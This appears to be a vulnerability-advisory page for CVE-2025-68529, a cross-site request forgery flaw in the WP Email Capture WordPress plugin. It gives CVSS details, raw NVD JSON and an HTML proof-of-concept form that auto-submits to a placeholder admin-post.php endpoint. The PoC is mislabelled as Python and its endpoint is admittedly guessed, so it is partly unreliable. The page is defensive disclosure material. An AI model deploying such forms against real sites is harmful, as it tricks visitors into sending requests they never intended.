Security Vulnerability Report
中文
CVE-2025-68529 CVSS 4.3 MEDIUM

CVE-2025-68529

Published: 2025-12-24 13:16:22
Last Modified: 2026-04-27 19:16:28

Description

Cross-Site Request Forgery (CSRF) vulnerability in Rhys Wynne WP Email Capture wp-email-capture allows Cross Site Request Forgery.This issue affects WP Email Capture: from n/a through <= 3.12.5.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WP Email Capture <= 3.12.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-68529 - WP Email Capture CSRF --> <!DOCTYPE html> <html> <head> <title>CSRF PoC - WP Email Capture</title> </head> <body> <h2>CSRF PoC for CVE-2025-68529</h2> <p>This PoC demonstrates the CSRF vulnerability in WP Email Capture plugin <= 3.12.5</p> <form id="csrfForm" action="http://target-site.com/wp-admin/admin-post.php" method="POST" enctype="multipart/form-data"> <!-- Replace action URL with actual vulnerable endpoint --> <input type="hidden" name="action" value="wp_email_capture_process"> <input type="hidden" name="wp_email_capture_name" value="Test User"> <input type="hidden" name="wp_email_capture_email" value="[email protected]"> <input type="hidden" name="wp_email_capture_submit" value="Submit"> <!-- Missing CSRF token field --> </form> <script> // Auto-submit form when page loads document.getElementById('csrfForm').submit(); console.log('CSRF request sent'); </script> <p>For demonstration purposes only. Modify target URL and parameters accordingly.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68529", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:22.357", "lastModified": "2026-04-27T19:16:28.390", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Rhys Wynne WP Email Capture wp-email-capture allows Cross Site Request Forgery.This issue affects WP Email Capture: from n/a through <= 3.12.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-email-capture/vulnerability/wordpress-wp-email-capture-plugin-3-12-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}